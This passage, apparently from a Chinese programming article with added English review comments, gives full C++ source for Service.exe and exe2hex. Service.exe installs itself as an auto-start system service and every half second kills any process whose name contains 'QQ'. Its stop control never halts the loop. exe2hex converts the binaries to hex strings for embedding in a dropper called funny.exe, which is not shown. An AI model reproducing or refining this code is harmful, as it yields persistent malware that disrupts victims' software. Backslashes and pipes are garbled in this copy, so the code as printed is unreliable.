// NOTE(review): this listing was collapsed onto a few very long lines by extraction and is re-broken here
//   for readability only; every token is as printed on the page. In this copy backslashes appear as "/"
//   (e.g. "/n" inside printf strings, "//Service.exe") and "|" appears as the box-drawing "│", so the
//   code does not compile as printed.
// Listing 1: Service.exe — a Win32 service that registers itself for auto-start with an image path under
//   the system directory and runs a worker thread that repeatedly terminates any process whose image name
//   contains "QQ"/"OICQ". Defender notes, all visible below: (1) persistence is a CreateService() call with
//   SERVICE_AUTO_START and SERVICE_INTERACTIVE_PROCESS — new-service installation logging is the natural
//   detection point; (2) the worker polls CreateToolhelp32Snapshot() every 500 ms and calls
//   TerminateProcess() on name matches — repeated process-termination auditing exposes it; (3) Handler()
//   only rewrites the reported state and never signals the worker, so a SERVICE_STOPPED report does not
//   stop the termination loop.
#include "stdafx.h"
#include "Service.h"
#include "winsvc.h"
#include <atlbase.h>   // header needed for the CRegKey class
#include <Afxtempl.h>  // header needed for the CArray class
#include <tlhelp32.h>  // header needed for the ToolHelp functions

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/ // NOTE(review): the lone "/" is the remnant of a "////..." divider line lost in extraction
// The one and only application object
CWinApp theApp;

using namespace std;

// Process-wide state shared by the service entry points below (no synchronization is visible).
SERVICE_STATUS_HANDLE ssh;   // status handle from RegisterServiceCtrlHandler(); never checked for NULL
SC_HANDLE scm,svc;           // SCM / service handles used by InstallService()
SERVICE_STATUS ss;           // status record reported through SetServiceStatus()
CArray<PROCESSENTRY32,PROCESSENTRY32 &> m_PEArray;  // process snapshot rebuilt on every pass of KillQQ()

void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv);
void WINAPI Handler(DWORD Opcode);
void InstallService();
UINT KillQQ(LPVOID lpvoid);

// Program entry point. Hands the service table to the SCM dispatcher and, once the dispatcher returns,
// falls through to InstallService(). The dispatcher's return value is not checked, so the self-install
// runs after any return — including the immediate failure the API gives when the binary is started from
// a console rather than by the SCM (API behaviour, not visible here).
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
    int nRetCode = 0;
    // initialize MFC and print and error on failure
    if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
    {
        // TODO: change error code to suit your needs
        cerr << _T("Fatal Error: MFC initialization failed") << endl;
        nRetCode = 1;
    }
    else
    {
        SERVICE_TABLE_ENTRY ste[2];           // thread entry table (a service table, despite the author's wording)
        ste[0].lpServiceName="Service";       // thread name (the service name "Service" is used by every call below)
        ste[0].lpServiceProc=ServiceMain;     // thread entry address
        // there can be several threads; the last entry must be NULL
        ste[1].lpServiceName=NULL;
        ste[1].lpServiceProc=NULL;
        StartServiceCtrlDispatcher(ste);
        InstallService();
    }
    return nRetCode;
}

// Install and start the service.
// Registers "Service" as an auto-start, interactive, own-process service whose image path is the system
// directory plus a (garbled here) separator and "Service.exe", then starts it. Observations: lpSysPath is
// never deleted; the CreateService() handle is overwritten by OpenService() without being closed; if
// CreateService() fails (svc stays NULL) nothing is opened or started; no return value is checked.
void InstallService()
{
    LPTSTR lpSysPath=new char[MAX_PATH];   // leaked: no matching delete[]
    ::GetSystemDirectory(lpSysPath,MAX_PATH);
    LPCTSTR lpsysfilename;
    lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,"//Service.exe");  // separator garbled in this copy; not a valid path as printed
    scm=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
    if(scm!=NULL)
        svc=CreateService(scm,"Service","Service",SERVICE_ALL_ACCESS,
            SERVICE_WIN32_OWN_PROCESS│SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,lpsysfilename,NULL,NULL,NULL,NULL,NULL);
    if(svc!=NULL)
        svc=OpenService(scm,"Service",SERVICE_START);  // previous svc handle is dropped unclosed
    if (svc!=NULL)
    {
        StartService(svc,0,NULL);
        CloseServiceHandle(svc);
    }
    CloseServiceHandle(scm);
}

// The real entry point of the service.
// Fills in the status record, registers Handler(), reports RUNNING, starts the KillQQ worker and reports
// RUNNING again. SERVICE_START_PENDING is assigned but overwritten before the first SetServiceStatus()
// call, so it is never reported; the thread object returned by AfxBeginThread() is discarded, which is
// why Handler() has nothing to signal on stop.
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{
    ss.dwServiceType = SERVICE_WIN32;
    ss.dwCurrentState = SERVICE_START_PENDING;
    ss.dwControlsAccepted = SERVICE_ACCEPT_STOP│ SERVICE_ACCEPT_PAUSE_CONTINUE;
    ss.dwServiceSpecificExitCode = 0;
    ss.dwWin32ExitCode = 0;
    ss.dwCheckPoint = 0;
    ss.dwWaitHint = 0;
    ssh=RegisterServiceCtrlHandler("Service",Handler);
    ss.dwCurrentState = SERVICE_RUNNING;
    ss.dwCheckPoint = 0;
    ss.dwWaitHint = 0;
    SetServiceStatus(ssh,&ss);
    AfxBeginThread(KillQQ,NULL,NULL);  // start a worker thread that implements the program's function
    ss.dwCurrentState = SERVICE_RUNNING;  // second, redundant RUNNING report
    ss.dwCheckPoint = 0;
    ss.dwWaitHint = 0;
    SetServiceStatus(ssh,&ss);
}

// Handle service control requests.
// Each control only changes the state value reported back to the SCM; the KillQQ thread is not paused,
// resumed or stopped by any branch, so STOP/PAUSE are cosmetic. The trailing SetServiceStatus() repeats
// the report for every opcode, including INTERROGATE.
void WINAPI Handler(DWORD Opcode)
{
    switch(Opcode)
    {
    case SERVICE_CONTROL_STOP:
        ss.dwCurrentState =SERVICE_STOPPED;
        SetServiceStatus (ssh,&ss);
        break;
    case SERVICE_CONTROL_CONTINUE:
        ss.dwCurrentState = SERVICE_RUNNING;
        SetServiceStatus (ssh,&ss);
        break;
    case SERVICE_CONTROL_PAUSE:
        ss.dwCurrentState = SERVICE_PAUSED;
        SetServiceStatus (ssh,&ss);
        break;
    case SERVICE_CONTROL_INTERROGATE:
        break;
    }
    SetServiceStatus (ssh,&ss);
}

// Worker thread: look for the QQ program in the process list and kill it.
// Infinite loop with no exit condition: every 500 ms it takes a TH32CS_SNAPPROCESS snapshot, copies each
// entry into the global m_PEArray, and calls TerminateProcess() on every entry whose szExeFile contains
// the substring "QQ", "OICQ", "qq" or "oicq" (mixed-case spellings are not matched; unrelated programs
// whose name happens to contain one of these substrings are). Observations: the snapshot handle is never
// closed (one handle leaked per pass); the snapshot and OpenProcess() results are not checked before use;
// the exit code 99 is passed to the victim process.
UINT KillQQ(LPVOID lParam)
{
    while(1)
    {
        m_PEArray.RemoveAll();
        HANDLE hProcessSnap=NULL;
        PROCESSENTRY32 pe32;
        hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  // never passed to CloseHandle()
        pe32.dwSize=sizeof(PROCESSENTRY32);
        if(::Process32First(hProcessSnap,&pe32))
        {
            do
            {
                m_PEArray.Add(pe32);
            } while(::Process32Next(hProcessSnap,&pe32));
        }
        int i;
        for(i=0;i<m_PEArray.GetSize();i++)
        {
            CString str;
            str.Format("%s",m_PEArray[i].szExeFile);
            if(str.Find("QQ")!=-1││str.Find("OICQ")!=-1││str.Find("qq")!=-1││str.Find("oicq")!=-1)
            {
                HANDLE hProcess;
                DWORD ProcessID;
                ProcessID=m_PEArray[i].th32ProcessID;
                hProcess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessID);  // NULL on failure, still passed on
                ::TerminateProcess(hProcess,99);
                CloseHandle(hProcess);
            }
        }
        Sleep(500);
    }
    return 0;
}
编译连接可以生成Service.exe程序.(后附整个工程) 现在我们已经得到了实现功能的两个程序,kernel.exe是在Win9X系统下实现功能的程序,Service.exe是Win2000/XP下实现功能的程序.现在就要将这两个文件转化成16进制代码.可以通过一个程序来实现,建立一个名为exe2hex的Win32 Console Application程序,程序代码如下:
// Listing 2: exe2hex — reads one file named on the command line into memory and prints it to stdout as a
//   C string literal of "\xNN" byte escapes, 16 bytes per quoted line (escapes appear as "//x", "/n" and
//   "/"" in this copy). The article uses the output to embed the two binaries above in a third program.
#include <stdio.h>
#include <windows.h>

// Entry point. Usage: exe2hex <File>; errors are printed and the __try block is left via __leave.
// Observation: hFile is declared without an initializer and __finally closes it unconditionally, so the
// argc!=2 path closes an indeterminate handle and the CreateFile() failure path closes
// INVALID_HANDLE_VALUE. GetLastError() is also reported after malloc(), which does not set it.
int main(int argc,char **argv)
{
    HANDLE hFile;
    DWORD dwSize,dwRead,dwIndex=0,i;
    unsigned char *lpBuff=NULL;
    __try
    {
        if(argc!=2)
        {
            printf("/nUsage: %s <File>",argv[0]);
            __leave;
        }
        hFile=CreateFile(argv[1],GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
        if(hFile==INVALID_HANDLE_VALUE)
        {
            printf("/nOpen file %s failed:%d",argv[1],GetLastError());
            __leave;
        }
        dwSize=GetFileSize(hFile,NULL);
        if(dwSize==INVALID_FILE_SIZE)
        {
            printf("/nGet file size failed:%d",GetLastError());
            __leave;
        }
        lpBuff=(unsigned char *)malloc(dwSize);
        if(!lpBuff)
        {
            printf("/nmalloc failed:%d",GetLastError());
            __leave;
        }
        // Read until the whole file is in lpBuff; a zero-byte successful read (file shrank) would loop forever.
        while(dwSize>dwIndex)
        {
            if(!ReadFile(hFile,&lpBuff[dwIndex],dwSize-dwIndex,&dwRead,NULL))
            {
                printf("/nRead file failed:%d",GetLastError());
                __leave;
            }
            dwIndex+=dwRead;
        }
        // Open a quoted line every 16 bytes; the dangling else binds to the inner if, as intended.
        for(i=0;i<dwSize;i++)
        {
            if((i%16)==0)
                if(i==0)
                    printf("/"");
                else
                    printf("/"/n/"");
            printf("//x%.2X",lpBuff[i]);
        }
        printf("/"");
    }//end of try
    __finally
    {
        if(lpBuff)
            free(lpBuff);
        CloseHandle(hFile);  // runs even when hFile was never assigned or is INVALID_HANDLE_VALUE
    }
    return 0;
}
编译出可执行文件exe2hex.exe,执行exe2hex kernel.exe >kernel.txt将输出结果重定向到一个文本文件就得到了kernel.exe的16进制代码,同理可以得到Service.exe的16进制代码. 啊,写了这么多还真有点累了,不过还好总算要完成了,歇口气.最后我们来编写主程序funny.exe: